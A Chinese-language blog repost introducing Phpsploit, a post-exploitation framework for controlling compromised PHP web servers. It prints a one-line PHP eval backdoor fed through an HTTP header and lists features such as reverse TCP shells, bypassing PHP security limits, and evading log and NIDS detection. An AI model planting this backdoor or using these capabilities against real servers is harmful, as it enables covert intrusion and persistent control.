转载

Phpsploit：隐蔽的Post-Exploitation框架

Phpsploit是一个远程控制框架，为客户端与服务器间提供shell交互连接。能够对Getshell的服务器进行管理实现权限提升。

Phpsploit利用多形态后门通道使模糊化通信机制通过客户端请求和WEB服务端响应中的HTTP头实现：

<? @eval($_SERVER['HTTP_PHPSPL01T']) ?>

特性：

高效性：可使用20多款插件实现post-exploitation任务自动化

  执行命令、浏览文件系统、绕过PHP安全限制；   在目标主机与客户端之间执行文件上传、下载操作；   通过本地编辑器来编辑远程主机上的文件；   在远程主机上运行数据库控制台；   产生反向TCP shell。

  不易被日志分析、NIDS特征检测所识别；   能够绕过安全模式和常见的PHP安全限制；   通信内容隐藏在HTTP头中；   payloads经过混淆来饶过NIDS；   支持http/https/socks4/socks5代理。

  在客户端和服务端实现跨平台；   强大的界面、多命令支持；   支持会话保存、载入，提供历史记录功能；

支持系统：

GNU/Linux Mac OS X Windows

*信息来源： Kitploit 项目地址： GitHub 0xroot编译整理内容有所删减，转载请注明来自FreeBuf黑客与极客（FreeBuf.COM）

正文到此结束

所属分类：编程技术

本文标签： web git 管理下载 linux shell 数据 http 自动化黑客主机 windows UI src 编译安全插件服务器数据库文件上传 root TCP PHP https GitHub
版权声明： 本文为互联网转载文章，出处已在文章中说明(部分除外)。如果侵权，请联系本站长删除，谢谢。
本文海报： 生成海报一生成海报二

本站定位：个人技术类博客

本站作用：写博客、记日志、闲聊扯淡鼓捣技术。